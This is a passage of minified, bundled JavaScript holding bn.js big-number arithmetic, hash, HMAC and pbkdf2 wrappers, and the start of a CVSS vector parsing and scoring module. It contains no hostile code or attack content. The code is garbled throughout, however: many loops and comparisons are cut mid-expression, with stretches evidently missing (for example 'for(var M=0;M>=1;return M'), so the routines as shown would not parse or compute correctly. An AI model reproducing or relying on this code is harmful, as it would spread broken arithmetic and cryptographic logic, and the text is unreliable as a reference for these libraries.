)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,v.length++),v};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var v,M=this.length+l.length;return v=10===this.length&&10===l.length?D(this,l,f):M<63?p(this,l,f):M<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var v=0,M=0,P=0;P>>26)|0)>>>26,G&=67108863}f.words[P]=X,v=G,G=M}return 0!==v?f.words[P]=v:f.length--,f.strip()}(this,l,f):x(this,l,f),v},S.prototype.makeRBT=function(l){for(var f=new Array(l),v=I.prototype._countBits(l)-1,M=0;M>=1;return M},S.prototype.permute=function(l,f,v,M,P,G){for(var X=0;X>>=1)P++;return 1<>>=13),P>>>=13;for(G=2*f;G>=26,f+=M/67108864|0,f+=P>>>26,this.words[v]=67108863&P}return 0!==f&&(this.words[v]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function A(z){for(var l=new Array(z.bitLength()),f=0;f>>M}return l}(l);if(0===f.length)return new I(1);for(var v=this,M=0;M=0);var P,f=l%26,v=(l-f)/26,M=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==v){for(P=this.length-1;P>=0;P--)this.words[P+v]=this.words[P];for(P=0;P=0),M=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<G)for(this.length-=G,h=0;h=0&&(0!==R||h>=M);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,v){return Q(0===this.negative),this.iushrn(l,f,v)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){Q("number"==typeof l&&l>=0);var f=l%26,v=(l-f)/26;return!(this.length<=v||!(this.words[v]&1<=0);var f=l%26,v=(l-f)/26;return Q(0===this.negative,"imaskn works only with positive numbers"),this.length<=v?this:(0!==f&&v++,this.length=Math.min(v,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if(Q("number"==typeof l),Q(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f>26)-(L/67108864|0),this.words[P+v]=67108863&G}for(;P>26,this.words[P+v]=67108863&G;if(0===X)return this.strip();for(Q(-1===X),X=0,P=0;P>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var v,M=this.clone(),P=l,G=0|P.words[P.length-1];0!=(v=26-this._countBits(G))&&(P=P.ushln(v),M.iushln(v),G=0|P.words[P.length-1]);var h,L=M.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R=0;Z--){var ue=67108864*(0|M.words[P.length+Z])+(0|M.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),M._ishlnsubmul(P,ue,Z);0!==M.negative;)ue--,M.negative=0,M._ishlnsubmul(P,1,Z),M.isZero()||(M.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),M.strip(),"div"!==f&&0!==v&&M.iushrn(v),{div:h||null,mod:M}},I.prototype.divmod=function(l,f,v){return Q(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(M=G.div.neg()),"div"!==f&&(P=G.mod.neg(),v&&0!==P.negative&&P.iadd(l)),{div:M,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(M=G.div.neg()),{div:M,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),v&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var M,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var v=0!==f.div.negative?f.mod.isub(l):f.mod,M=l.ushrn(1),P=l.andln(1),G=v.cmp(M);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){Q(l<=67108863);for(var f=(1<<26)%l,v=0,M=this.length-1;M>=0;M--)v=(f*v+(0|this.words[M]))%l;return v},I.prototype.idivn=function(l){Q(l<=67108863);for(var f=0,v=this.length-1;v>=0;v--){var M=(0|this.words[v])+67108864*f;this.words[v]=M/l|0,f=M%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){Q(0===l.negative),Q(!l.isZero());var f=this,v=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var M=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&v.isEven();)f.iushrn(1),v.iushrn(1),++L;for(var h=v.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(M.isOdd()||P.isOdd())&&(M.iadd(h),P.isub(R)),M.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(v.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(v.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(v)>=0?(f.isub(v),M.isub(G),P.isub(X)):(v.isub(f),G.isub(M),X.isub(P))}return{a:G,b:X,gcd:v.iushln(L)}},I.prototype._invmp=function(l){Q(0===l.negative),Q(!l.isZero());var J,f=this,v=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var M=new I(1),P=new I(0),G=v.clone();f.cmpn(1)>0&&v.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)M.isOdd()&&M.iadd(G),M.iushrn(1);for(var h=0,R=1;0==(v.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(v.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(v)>=0?(f.isub(v),M.isub(P)):(v.isub(f),P.isub(M))}return(J=0===f.cmpn(1)?M:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),v=l.clone();f.negative=0,v.negative=0;for(var M=0;f.isEven()&&v.isEven();M++)f.iushrn(1),v.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;v.isEven();)v.iushrn(1);var P=f.cmp(v);if(P<0){var G=f;f=v,v=G}else if(0===P||0===v.cmpn(1))break;f.isub(v)}return v.iushln(M)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){Q("number"==typeof l);var f=l%26,v=(l-f)/26,M=1<>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var v,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)v=1;else{f&&(l=-l),Q(l<=67108863,"Number is too big");var M=0|this.words[0];v=M===l?0:Ml.length)return 1;if(this.length=0;v--){var M=0|this.words[v],P=0|l.words[v];if(M!==P){MP&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return Q(!this.red,"Already a number in reduction context"),Q(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return Q(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return Q(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return Q(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return Q(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return Q(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return Q(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return Q(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return Q(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return Q(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return Q(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return Q(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return Q(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return Q(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function B(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){B.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){B.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){B.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){B.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else Q(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}B.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},B.prototype.ireduce=function(l){var v,f=l;do{this.split(f,this.tmp),v=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(v>this.n);var M=v0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},B.prototype.split=function(l,f){l.iushrn(this.n,0,f)},B.prototype.imulK=function(l){return l.imul(this.k)},ae(K,B),K.prototype.split=function(l,f){for(var v=4194303,M=Math.min(l.length,9),P=0;P>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,v=0;v>>=26,l.words[v]=P,f=M}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){Q(0===l.negative,"red works only with positives"),Q(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){Q(0==(l.negative|f.negative),"red works only with positives"),Q(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var v=l.add(f);return v.cmp(this.m)>=0&&v.isub(this.m),v._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var v=l.iadd(f);return v.cmp(this.m)>=0&&v.isub(this.m),v},le.prototype.sub=function(l,f){this._verify2(l,f);var v=l.sub(f);return v.cmpn(0)<0&&v.iadd(this.m),v._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var v=l.isub(f);return v.cmpn(0)<0&&v.iadd(this.m),v},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if(Q(f%2==1),3===f){var v=this.m.add(new I(1)).iushrn(2);return this.pow(l,v)}for(var M=this.m.subn(1),P=0;!M.isZero()&&0===M.andln(1);)P++,M.iushrn(1);Q(!M.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,M),J=this.pow(l,M.addn(1).iushrn(1)),Z=this.pow(l,M),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();Q(Ae=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==M[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,M[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var v=l.imul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var v=l.mul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},2161:(Pe,we,de)=>{"use strict";var ie=de(2270),j=de(807),Q=de(1447),ae=de(6890),I=de(4003);function $(U){I.call(this,"digest"),this._hash=U}ie($,I),$.prototype._update=function(U){this._hash.update(U)},$.prototype._final=function(){return this._hash.digest()},Pe.exports=function(E){return"md5"===(E=E.toLowerCase())?new j:"rmd160"===E||"ripemd160"===E?new Q:new $(ae(E))}},6853:(Pe,we,de)=>{var ie=de(807);Pe.exports=function(j){return(new ie).update(j).digest()}},4295:(Pe,we,de)=>{"use strict";var ie=de(2270),j=de(1536),Q=de(4003),ae=de(265).Buffer,I=de(6853),$=de(1447),U=de(6890),E=ae.alloc(128);function C(b,_){Q.call(this,"digest"),"string"==typeof _&&(_=ae.from(_));var y="sha512"===b||"sha384"===b?128:64;this._alg=b,this._key=_,_.length>y?_=("rmd160"===b?new $:U(b)).update(_).digest():_.length{"use strict";var ie=de(2270),j=de(265).Buffer,Q=de(4003),ae=j.alloc(128),I=64;function $(U,E){Q.call(this,"digest"),"string"==typeof E&&(E=j.from(E)),this._alg=U,this._key=E,E.length>I?E=U(E):E.length{"use strict";we.O6=de(2419),de(2161),de(4295);var j=de(2196),Q=Object.keys(j),I=(["sha1","sha224","sha256","sha384","sha512","md5","rmd160"].concat(Q),de(8597));we.Sf=I.pbkdf2Sync;var $=de(4271);we.CW=$.createCipheriv,we.G_=$.createDecipheriv;de(782),de(9494);de(4707);de(8831),de(3478)},306:function(Pe){"undefined"!=typeof self&&self,Pe.exports=function(we){var de={};function ie(j){if(de[j])return de[j].exports;var Q=de[j]={i:j,l:!1,exports:{}};return we[j].call(Q.exports,Q,Q.exports,ie),Q.l=!0,Q.exports}return ie.m=we,ie.c=de,ie.d=function(j,Q,ae){ie.o(j,Q)||Object.defineProperty(j,Q,{enumerable:!0,get:ae})},ie.r=function(j){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(j,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(j,"__esModule",{value:!0})},ie.t=function(j,Q){if(1&Q&&(j=ie(j)),8&Q||4&Q&&"object"==typeof j&&j&&j.__esModule)return j;var ae=Object.create(null);if(ie.r(ae),Object.defineProperty(ae,"default",{enumerable:!0,value:j}),2&Q&&"string"!=typeof j)for(var I in j)ie.d(ae,I,function($){return j[$]}.bind(null,I));return ae},ie.n=function(j){var Q=j&&j.__esModule?function(){return j.default}:function(){return j};return ie.d(Q,"a",Q),Q},ie.o=function(j,Q){return Object.prototype.hasOwnProperty.call(j,Q)},ie.p="",ie(ie.s=1)}([function(we,de){function ie(Q,ae){return function(I){if(Array.isArray(I))return I}(Q)||function(I,$){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(I)){var U=[],E=!0,C=!1,b=void 0;try{for(var _,y=I[Symbol.iterator]();!(E=(_=y.next()).done)&&(U.push(_.value),!$||U.length!==$);E=!0);}catch(A){C=!0,b=A}finally{try{E||null==y.return||y.return()}finally{if(C)throw b}}return U}}(Q,ae)||function(I,$){if(I){if("string"==typeof I)return j(I,$);var U=Object.prototype.toString.call(I).slice(8,-1);if("Object"===U&&I.constructor&&(U=I.constructor.name),"Map"===U||"Set"===U)return Array.from(I);if("Arguments"===U||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(U))return j(I,$)}}(Q,ae)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function j(Q,ae){(null==ae||ae>Q.length)&&(ae=Q.length);for(var I=0,$=new Array(ae);I1&&void 0!==arguments[1]?arguments[1]:{},I={},$=0,U=Object.entries(Q);$1&&!I[B.charAt(0)]&&(I[B.charAt(0)]=K);for(var ee=0,se=Object.entries(K);ee1&&!K[le.charAt(0)]&&(K[le.charAt(0)]=ye)}}return I},de.roundUp=function(Q){return Math.ceil(Math.round(1e5*(10*Q+Number.EPSILON))/1e5)/10},de.round=function(Q){return Math.round(10*(Q+Number.EPSILON))/10},de.parseCvssVector=function(Q,ae,I){var $,D,U={short:{},long:{}};U.short=(D={},Q.split("/").forEach(function(w){var x=w.split(":");D[x[0]]=x[1]}),D),U.short.CVSS||(U.short.CVSS=($=U.short).IB?"1.0":$.Au?"2.0":"3.1");for(var E=(ae||I[U.short.CVSS]).getMetricCodeMap(),C=0,b=Object.entries(U.short);C0&&(f=1.176*(.6*z+.4*l-1.5)),Object(j.round)(f)}},{key:"getTemporalScore",value:function(){return Object(j.round)(this.getBaseScore()*E.get("Exploitability",this.cvss)*E.get("Remediation 